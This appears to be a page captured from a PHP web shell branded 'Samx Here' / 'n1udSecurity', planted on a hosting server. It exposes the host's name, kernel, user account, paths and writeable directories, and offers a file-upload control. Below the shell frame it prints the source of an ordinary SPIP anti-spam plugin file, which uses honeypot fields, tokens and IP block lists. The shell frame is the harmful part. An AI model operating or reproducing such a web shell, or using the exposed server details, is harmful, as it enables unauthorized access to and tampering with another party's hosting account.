Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/chretien/plugins/auto/nospam/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/chretien/plugins/auto/nospam/nospam_pipelines.php
<?php
/**
 * Plugin No-SPAM
 * (c) 2008-2019 Cedric Morin Yterium&Nursit
 * Licence GPL
 *
 */

if (!defined("_ECRIRE_INC_VERSION")) return;
if (!defined('_SPAM_URL_MAX_OCCURENCES')) define('_SPAM_URL_MAX_OCCURENCES', 3);
if (!defined('_SPAM_ENCRYPT_NAME')) define('_SPAM_ENCRYPT_NAME', false);

/**
 * Lister les formulaires a prendre en charge contre le SPAM
 * pour verifier le nobot et le jeton sur un formulaire, l'ajouter a cette liste
 * par le pipeline nospam_lister_formulaires
 * @return array
 */
function nospam_lister_formulaires() {
	if (!isset($GLOBALS['formulaires_no_spam']))
		$GLOBALS['formulaires_no_spam'] = array();
	$formulaires = array_merge($GLOBALS['formulaires_no_spam'], array('inscription', 'forum', 'ecrire_auteur', 'signature', 'recommander', 'newsletter_subscribe', 'newsletter_unsubscribe'));
	return pipeline('nospam_lister_formulaires', $formulaires);
}

/**
 * Ajouter le champ de formulaire 'nobot' au besoin
 *
 * @param array $flux
 * @return array
 */
function nospam_formulaire_fond($flux) {
	// determiner le nom du formulaire
	$form = $flux['args']['form'];
	if (in_array($form, nospam_lister_formulaires())
		or !empty($flux['args']['contexte']['_nospam_encrypt'])) {
		// on ajoute le champ 'nobot' si pas present dans le formulaire
		nospam_inserer_nobot($flux['data'], $flux['args']['contexte']);
	}
	return $flux;
}

/**
 * Inserer un champ nobot au hasard dans le form
 * et crypter tous les name
 * @param string $texte
 * @param array $args
 */
function nospam_inserer_nobot(&$texte, $args) {
	if ((false === strpos($texte, 'name="email_nobot"'))
		AND (false !== $pos = strpos($texte, '</form>'))
	) {
		// essayer de s'inserer au hasard entre 2 div/li du form
		if (preg_match_all(",<(div|li)\b[^>]*class=['\"]editer[^>]*,ims", $texte, $m)
			AND $i = rand(0, count($m[0]) - 1)
			AND $p = strpos($texte, $m[0][$i])) {
			$nobot = recuperer_fond("inclure/nobot", array('email_nobot' => '', 'div' => $m[1][$i]));
			$texte = substr_replace($texte, $nobot, $p, 0);
		} // et sinon a la fin juste avant la(les) balise(s) </form>
		else {
			$nobot = recuperer_fond("inclure/nobot", array('email_nobot' => ''));
			$texte = str_replace('</form>', $nobot . '</form>', $texte);
		}
	}
	if (_SPAM_ENCRYPT_NAME
		or (isset($args['_nospam_encrypt']) and $args['_nospam_encrypt'])) {
		include_spip('inc/nospam_encrypt');
		$texte = nospam_encrypt_form_names(
			$texte,
			(isset($args['_nospam_encrypt']) and $args['_nospam_encrypt'] === 'all') ? false : true,
			null,
			isset($args['_nospam_may_be_bot']) ? $args['_nospam_may_be_bot'] : false
		);
	}
}


/**
 * Ajouter un jeton temporaire lie a l'heure et a l'IP pour limiter la reutilisation possible du formulaire
 *
 * @param array $flux
 * @return array
 */
function nospam_formulaire_charger($flux) {
	$form = $flux['args']['form'];
	if ($flux['data']
		AND is_array($flux['data'])
		AND (in_array($form, nospam_lister_formulaires()) or !empty($flux['data']['_nospam_encrypt']))
	) {
		include_spip("inc/nospam");
		$jeton = nospam_creer_jeton($form);
		if (!isset($flux['data']['_hidden'])) {
			$flux['data']['_hidden'] = "";
		}
		$hidden_jeton = "<input type='hidden' name='_jeton' value='$jeton' />";
		$flux['data']['_hidden'] .= $hidden_jeton;
		nospam_memoriser_jeton($hidden_jeton);
		//$flux['data']['_jeton'] = $jeton;

		if (_SPAM_ENCRYPT_NAME
			or (isset($flux['data']['_nospam_encrypt']) and $flux['data']['_nospam_encrypt'])) {
			include_spip('inc/nospam_encrypt');
			$flux['data'] = nospam_encrypt_check_valeurs($flux['data'], $flux['args']);
			// si on suspecte que c'est un bot on va lui faire cocher une case
			if (nospam_may_be_bot()) {
				$flux['data']['_nospam_may_be_bot'] = 1;
			}
		}
	}
	return $flux;
}

/**
 * Decrypter le POST avant appel des verifier si besoin
 * Si on est appelé ici (SPIP >3.1.5) ça permet d'arriver dans le verifier() avec des name decryptés
 * et de pas rejouer 2 fois le verifier(), ce qui est plus safe
 *
 * @param array $flux
 * @return array
 */
function nospam_formulaire_receptionner($flux){
	$form = $flux['args']['form'];

	// y a-t-il des names encryptes a decrypter ?
	if (_SPAM_ENCRYPT_NAME or _request('_nospam_encrypt')){
		include_spip("inc/nospam");
		include_spip("inc/nospam_encrypt");

		// y a-t-il des names encryptes a decrypter ?
		// si oui on les decrypte avant execution de verifier
		include_spip("inc/nospam_encrypt");
		$res = nospam_encrypt_decrypt_post($form);

		// rien a faire selon le resultat, c'est de toute façon rejoué dans verifier() qui catchera les erreurs si besoin
	}

	return $flux;
}

/**
 * Verifier le jeton temporaire lie a l'heure et a l'IP pour limiter la reutilisation possible du formulaire
 *
 * @param array $flux
 * @return array
 */
function nospam_formulaire_verifier($flux) {
	$form = $flux['args']['form'];
	if (in_array($form, nospam_lister_formulaires()) or _request('_nospam_encrypt')) {
		include_spip("inc/nospam");

		$erreur = '';
		// y a-t-il (encore) des names encryptes a decrypter ?
		// - soit nospam_formulaire_receptionner() a fait le job et rien a faire ici (retour false)
		// - soit il y a eu une erreur lors de nospam_formulaire_receptionner() et on va la retrouver ici
		// - soit on est en SPIP < 3.1.5 et on les decrypte puis on relance la verif complete ()
		//   - au second coup de verifier() on ne fait rien car nospam_formulaire_receptionner() renvoie false
		if (_SPAM_ENCRYPT_NAME or _request('_nospam_encrypt')) {
			include_spip("inc/nospam_encrypt");
			$res = nospam_encrypt_decrypt_post($form);

			if (is_string($res)) {
				$erreur = $res;
			}
			// si on a decode des champs, il faut relancer toute la chaine de verification et sortir
			elseif ($res) {
				$verifier = charger_fonction("verifier", "formulaires/$form/", true);
				$flux['data'] = pipeline(
					'formulaire_verifier',
					array(
						'args' => array('form' => $form, 'args' => $flux['args']['args']),
						'data' => $verifier ? call_user_func_array($verifier, $flux['args']['args']) : array())
				);
				return $flux;
			}
		}

		// pas la peine si on a deja une erreur
		if (!$erreur) {
			$jeton = _request('_jeton');
			if (_request('nobot') // trop facile !
				OR _request('email_nobot')
				OR (!nospam_verifier_jeton($jeton, $form))
			) {
				if (_request('email_nobot')) {
					spip_log("form $form:email_nobot rempli: " . _request('email_nobot'), 'nospam' . _LOG_INFO_IMPORTANTE);
					$erreur = _T('nospam:erreur_jeton');
                    $flood = sous_repertoire(_DIR_TMP, 'flood') . $GLOBALS['ip'];
                    @touch($flood);
				}
				elseif (_request('nobot')) {
					spip_log("form $form:nobot rempli: " . _request('email_nobot'), 'nospam' . _LOG_INFO_IMPORTANTE);
					$erreur = _T('nospam:erreur_jeton');
                    $flood = sous_repertoire(_DIR_TMP, 'flood') . $GLOBALS['ip'];
                    @touch($flood);
				}
				elseif(!nospam_verifier_jeton($jeton, $form)) {
					spip_log("form $form:jeton incorrect: $jeton", 'nospam' . _LOG_INFO_IMPORTANTE);
					#spip_log('pas de jeton pour '.var_export($flux,true),'nospam' . _LOG_DEBUG);
					$erreur = _T('nospam:erreur_jeton');
				}
			}
		}

		if ($erreur) {
			if (!isset($flux['data']['message_erreur'])) {
				$flux['data']['message_erreur'] = '';
			}
			$flux['data']['message_erreur'] .= $erreur;

			if ($form === 'forum') {
				unset($flux['data']['previsu']);
			}
		}


		// pas la peine de filtrer les contenus postés par un admin
		if (!isset($GLOBALS['visiteur_session']['statut']) OR $GLOBALS['visiteur_session']['statut'] !== '0minirezo') {
			if ($verifier_formulaire = charger_fonction("verifier_formulaire_$form", "nospam", true)) {
				$flux = $verifier_formulaire($flux);
				// recuperation de la liste des IPs blacklist/greylist
				// async si on renvoie la previsu ou si erreur
				$async = false;
				if (count($flux['data']))
					$async = true;
				nospam_update_ip_list($async);
			}
		}
	}
	return $flux;
}

/**
 * Au moment de decider du statut d'un forum,
 * quelques verifications et une moderation si necessaire !
 *
 * @param array $flux
 * @return array
 */
function nospam_pre_edition($flux) {
	if ($flux['args']['table'] == 'spip_forum'
		AND $flux['args']['action'] == 'instituer'
	) {

		// ne pas publier automatiquement certains messages suspects ...
		// sauf si le posteur a de toute facon le pouvoir de moderer et de se publier
		include_spip('inc/autoriser');
		if (
			!empty($flux['data']['statut'])
			and in_array($flux['data']['statut'], array('prop', 'publie'))
			and (!isset($GLOBALS['visiteur_session']['statut']) OR !autoriser('modererforum'))
		) {
			// verifier le status de cette IP
			nospam_check_ip_status($GLOBALS['ip']);

			$email = strlen($flux['data']['email_auteur']) ? " OR email_auteur=" . sql_quote($flux['data']['email_auteur']) : "";
			$spammeur_connu = (!isset($GLOBALS['visiteur_session']['statut'])
				AND (
					isset($GLOBALS['ip_greylist'][$GLOBALS['ip']])
					OR isset($GLOBALS['ip_blacklist'][$GLOBALS['ip']])
					OR sql_countsel('spip_forum', '(ip=' . sql_quote($GLOBALS['ip']) . "$email) AND statut='spam'") > 0
				)
			);

			// activer aussi le flag spammeur connu en cas de flood, meme si aucune detection spam jusqu'ici
			// on sera plus severe sur les liens dans ce cas
			// cas du spammeur qui envoie que des messages a 3 liens a haute frequence (passe a travers tous les filtres)
			// au bout du 5e message en <10min ou 10e en <30min on va moderer tout message avec un lien
			if (!$spammeur_connu) {
				if (($nb = sql_countsel('spip_forum', '(ip=' . sql_quote($GLOBALS['ip']) . $email . ') AND ' . nospam_sql_date_proche('date_heure', '-30', 'minute'))) >= 7) {
					spip_log("[Flood] $nb message pour (ip=" . $GLOBALS['ip'] . "$email) dans les 30 dernieres minutes", 'nospam');
					$spammeur_connu = true;
				}
			}
			if (!$spammeur_connu) {
				if (($nb = sql_countsel('spip_forum', '(ip=' . sql_quote($GLOBALS['ip']) . $email . ') AND ' . nospam_sql_date_proche('date_heure', '-10', 'minute'))) >= 3) {
					spip_log("[Flood] $nb message pour (ip=" . $GLOBALS['ip'] . "$email) dans les 10 dernieres minutes", 'nospam');
					$spammeur_connu = true;
				}
			}

			$lang_suspecte = false;
			// si c'est un spammeur connu,
			// verifier que cette ip n'en est pas a son N-ieme spam en peu de temps
			// a partir d'un moment on refuse carrement le spam massif, le posteur devra attendre pour reposter
			if ($spammeur_connu) {
				// plus de 30 spams dans les dernieres 2h, faut se calmer ...
				// ou plus de 10 spams dans la dernieres 1h, faut se calmer ...
				// ou IP blacklistee et plus de 5 messages prop/spam dans les dernieres 48h, faut se calmer ...
				if (
					(isset($GLOBALS['ip_blacklist'][$GLOBALS['ip']])
						AND ($nb = sql_countsel('spip_forum', sql_in('statut', array('spam')) . ' AND (ip=' . sql_quote($GLOBALS['ip']) . ') AND ' . nospam_sql_date_proche('date_heure', '-48', 'hour'))) >= 5
						AND $h = 48
					)
					OR
					(($nb = sql_countsel('spip_forum', 'statut=\'spam\' AND (ip=' . sql_quote($GLOBALS['ip']) . $email . ') AND ' . nospam_sql_date_proche('date_heure', '-120', 'minute'))) >= 30
						AND $h = 2)
					OR
					(($nb = sql_countsel('spip_forum', 'statut=\'spam\' AND (ip=' . sql_quote($GLOBALS['ip']) . $email . ') AND ' . nospam_sql_date_proche('date_heure', '-60', 'minute'))) >= 10
						AND $h = 1)
				) {
					$flux['data']['statut'] = ''; // on n'en veut pas !
					spip_log("[Refuse] $nb spam pour (ip=" . $GLOBALS['ip'] . "$email) dans les $h dernieres heures", 'nospam');
					return $flux;
				}
				spip_log("POST *suspect* spammeur_connu", "nospam");
			}
			// sinon regarder si l'objet a une langue, et si le post est dans la meme langue ou non
			// en cas de langue differente, on se mefie
			else {
				$lang_objet = ($GLOBALS['spip_lang'] ? $GLOBALS['spip_lang'] : $GLOBALS['meta']['langue_site']);
				if ($flux['data']['objet']) {
					$table = table_objet_sql($flux['data']['objet']);
					$trouver_table = charger_fonction("trouver_table", "base");
					if ($desc = $trouver_table($table)
						AND isset($desc['field']['lang'])) {
						$primary = id_table_objet($flux['data']['objet']);
						$lang_objet = sql_getfetsel("lang", $table, "$primary=" . intval($flux['data']['id_objet']));
					}
				}
				include_spip("inc/detecter_langue");
				$lang_post = _detecter_langue($flux['data']['texte']);
				if ($lang_post !== $lang_objet)
					$lang_suspecte = true;
				spip_log("POST " . ($lang_suspecte ? "*suspect* " : "") . "en langue [$lang_post] sur $primary=" . $flux['data']['id_objet'] . " en langue [$lang_objet]", "nospam");
			}

			// si c'est un message bourre de liens, on le modere
			// le seuil varie selon le champ et le fait que le spammeur est deja connu ou non
			$seuils = array(
				// seuils par defaut
				0 => array(
					0 => array(1 => 'prop', 3 => 'spam'), // seuils par defaut
					'url_site' => array(2 => 'spam'), // 2 liens dans le champ url, c'est vraiment louche
					'texte' => array(4 => 'prop', 20 => 'spam') // pour le champ texte
				),
				// seuils severises pour les suspects : modere en prop des qu'il y a un lien, spam si plus de 5
				'suspect' => array(
					0 => array(1 => 'spam'),
					'url_site' => array(2 => 'spam'), // 2 liens dans le champ url, c'est vraiment louche
					'texte' => array(1 => 'prop', 5 => 'spam')
				),
				// seuils pour les blacklist : si pas de lien on passe en prop par precaution, sinon en spam
				'blacklist' => array(
					0 => array(1 => 'spam'),
					'url_site' => array(2 => 'spam'), // 2 liens dans le champ url, c'est vraiment louche
					'texte' => array(0 => 'prop', 1 => 'spam')
				)
			);

			$seuils = isset($GLOBALS['ip_blacklist'][$GLOBALS['ip']]) ? $seuils['blacklist'] : (($spammeur_connu OR $lang_suspecte) ? $seuils['suspect'] : $seuils[0]);
			include_spip("inc/nospam"); // pour nospam_analyser_spams()
			foreach ($flux['data'] as $champ => $valeur) {
				$infos = nospam_analyser_spams($valeur);
				if ($infos['contenu_cache']) {
					// s'il y a du contenu caché avec des styles => spam direct
					$flux['data']['statut'] = 'spam';
					spip_log("\t" . $flux['data']['auteur'] . "\t" . $GLOBALS['ip'] . "\t" . "requalifié en spam car contenu cache", 'nospam');
				} elseif ($infos['nombre_liens'] > 0) {
					// si un lien a un titre de moins de 3 caracteres, c'est louche...
					if ($infos['caracteres_texte_lien_min'] < 3) {
						$flux['data']['statut'] = 'prop'; // en dur en attendant une idee plus generique
						spip_log("\t" . $flux['data']['auteur'] . "\t" . $GLOBALS['ip'] . "\t" . "requalifié en prop car moins de 3car hors liens", 'nospam');
					}

					if (isset($seuils[$champ]))
						$seuil = $seuils[$champ];
					else
						$seuil = $seuils[0];

					foreach ($seuil as $s => $stat)
						if ($infos['nombre_liens'] >= $s) {
							$flux['data']['statut'] = $stat;
							spip_log("\t" . $flux['data']['auteur'] . "\t" . $GLOBALS['ip'] . "\t" . "requalifié en " . $stat . " car nombre_liens >= " . $s, 'nospam');
						}

					if ($flux['data']['statut'] != 'spam') {
						$champs = array_unique(array('texte', $champ));
						if ($h = nospam_rechercher_presence_liens_spammes($infos['liens'], _SPAM_URL_MAX_OCCURENCES, 'spip_forum', $champs)) {
							$flux['data']['statut'] = 'spam';
							spip_log("\t" . $flux['data']['auteur'] . "\t" . $GLOBALS['ip'] . "\t" . "requalifié en spam car lien $h deja dans un spam", 'nospam');
						}
					}
				}
			}


			// verifier qu'un message identique n'a pas ete publie il y a peu
			if ($flux['data']['statut'] != 'spam') {
				if (sql_countsel('spip_forum', 'texte=' . sql_quote($flux['data']['texte']) . " AND statut IN ('publie','off','spam')") > 0) {
					$flux['data']['statut'] = 'spam';
					spip_log("\t" . $flux['data']['auteur'] . "\t" . $GLOBALS['ip'] . "\t" . "requalifié en spam car message identique deja existant", 'nospam');
				}
			}
			// verifier que cette ip n'en est pas a son N-ieme post en peu de temps
			// plus de 5 messages en 5 minutes c'est suspect ...
			if ($flux['data']['statut'] != 'spam') {
				if (($nb = sql_countsel('spip_forum', 'ip=' . sql_quote($GLOBALS['ip']) . ' AND ' . nospam_sql_date_proche('date_heure', '-5', 'minute'))) >= 5) {
					$flux['data']['statut'] = 'spam';
					spip_log("[Flood2] $nb message pour (ip=" . $GLOBALS['ip'] . "$email) dans les 5 dernieres minutes : requalif en spam", 'nospam');
				}
			}
		}
	}
	return $flux;
}

/**
 * @param $champ
 * @param $interval
 * @param $unite
 * @return string
 */
function nospam_sql_date_proche($champ, $interval, $unite) {
	if (function_exists("sql_date_proche"))
		return sql_date_proche($champ, $interval, $unite);

	return '('
		. $champ
		. (($interval <= 0) ? '>' : '<')
		. (($interval <= 0) ? 'DATE_SUB' : 'DATE_ADD')
		. '('
		. sql_quote(date('Y-m-d H:i:s'))
		. ', INTERVAL '
		. (($interval > 0) ? $interval : (0 - $interval))
		. ' '
		. $unite
		. '))';
}


/**
 * Fermer la connexion pour que le visiteur n'attende pas apres le curl sur nospam.spip.net
 * @param $content
 * @return mixed
 */
function nospam_flush_close($content) {
	header("Content-Length: " . ($l = ob_get_length()));
	header("Connection: close");
	return $content;
}

/**
 * Flusher et lancer l'update de la liste des ip
 */
function nospam_flush_and_update() {
	chdir(_ROOT_CWD); // securite en cas de register_shutdown_function
	// forcer le flush des tampons pas envoyes (declenche le content-length/conection:close envoye dans cache_cool_flush)
	$flush_level = ob_get_level();
	while ($flush_level--) ob_end_flush();
	flush();
	if (function_exists('fastcgi_finish_request'))
		fastcgi_finish_request();
	nospam_update_ip_list();
}

if (!defined('_NOSPAM_IP_LIST_CACHE')) define('_NOSPAM_IP_LIST_CACHE', 3600);

/**
 * Recuperer la liste des IP black ou grey sur nospam.spip.net
 * si on a pas une liste a jour
 * et la stocker dans un fichier
 * @param bool $async
 */
function nospam_update_ip_list($async = false) {
	spip_log("nospam_update_ip_list:$async", 'nospam' . _LOG_DEBUG);

	$file = _DIR_TMP . "nospam_ip_list.txt";
	if (file_exists($file) AND filemtime($file) > time() - _NOSPAM_IP_LIST_CACHE) {
		return;
    }

	if ($async) {
		// indiquer de fermer la connexion dans la foulee
		// pour faire le hit de recuperation async hors temps d'attente
		ob_start("nospam_flush_close");
		register_shutdown_function("nospam_flush_and_update");
		return;
	}

	// on fait d'abord un touch car si le recuperer_url echoue (hebergeurs qui interdisent)
	// on ne veut pas recommencer plein de fois de suite
	@touch($file);
	$url_api = "http://nospam.spip.net/spamsignal.api/list";
	include_spip("inc/distant");
	include_spip("inc/json");
	$res = recuperer_url($url_api);
	$res = isset($res['page']) ? $res['page'] : null;
	if (!$res AND file_exists($f = _DIR_TMP . "spamsignal-api-list.txt"))
		lire_fichier($f, $res);
	if ($res
		AND function_exists("json_decode")
		AND $liste = json_decode($res, true)) {
		ecrire_fichier($file, serialize($liste));
	}
}

/**
 * Verifier le status d'une IP et la noter dans la globale ip_blacklist ou ip_greylist si c'est une IP louche
 * @param $ip
 * @return string
 *   ok|grey|black
 */
function nospam_check_ip_status($ip) {
	spip_log("nospam_check_ip_status:$ip", 'nospam' . _LOG_DEBUG);

	$file = _DIR_TMP . "nospam_ip_list.txt";
	if (file_exists($file)
        && (filemtime($file) >= time() - 2 * _NOSPAM_IP_LIST_CACHE)) {

        lire_fichier($file, $liste);
        if ($liste = unserialize($liste)) {
            #spip_log($liste,"nospam");
            $now = date('Y-m-d H:i:s');
            $ip_family = preg_replace(",([.:])[^.:]+$,", "$1*", $ip);
            spip_log("ip $ip famille $ip_family", "nospam");
            foreach (array("blacklist", "greylist") AS $l) {
                if (isset($liste[$l][$ip])
                    AND $liste[$l][$ip] > $now) {
                    $GLOBALS['ip_' . $l][$ip] = true;
                    spip_log("$ip ajoute a ip_$l", "nospam");
                    return ($l == "blacklist" ? "black" : "grey");
                }
                if (isset($liste[$l][$ip_family])
                    AND $liste[$l][$ip_family] > $now) {
                    $GLOBALS['ip_' . $l][$ip] = true;
                    spip_log("$ip ajoute a ip_$l (famille $ip_family)", "nospam");
                    return ($l == "blacklist" ? "black" : "grey");
                }
            }
        }
    }

    // si l'IP a été repérée et notée dans tmp/flood/ il y a moins de 24h alors on la grey automatiquement
    if (file_exists($f = _DIR_TMP . 'flood/' . $GLOBALS['ip'])) {
        if (filemtime($f) > time() - 24 * 3600) {
            return "grey";
        }
    }

	return "ok";
}

/**
 * Mémoriser les jetons générés dans ce hit
 * @param $jeton
 * @return array|void
 */
function nospam_memoriser_jeton($jeton = null) {
	static $jetons = [];
	if (is_null($jeton)) {
		return $jetons;
	}
	$jetons[] = $jeton;
}

/**
 * Compter les jetons dans la page et verifier qu'ils sont tous frais (et non issu du cache)
 *
 * @param string $flux
 * @return string
 */
function nospam_affichage_final($flux) {
	$jetons_frais = nospam_memoriser_jeton();
	$search = "<input type='hidden' name='_jeton' value='";

	$p = 0;
	while(($p = strpos($flux, $search, $p)) !== false) {
		$is_jeton_cache = true;
		foreach ($jetons_frais as $jeton_frais) {
			if (strpos($flux, $jeton_frais, $p) === $p) {
				$is_jeton_cache = false;
				break;
			}
		}
		if ($is_jeton_cache) {
			spip_log('jeton avarié (en cache ? vérifiez les inclusions statiques de formulaire...): '.substr($flux, $p, 110), 'nospam' . _LOG_ERREUR);
			spip_log('Jetons frais de ce hit : ' . json_encode($jetons_frais), 'nospam' . _LOG_DEBUG);
		}
		$p+= 100;
	}
	return $flux;
}

SAMX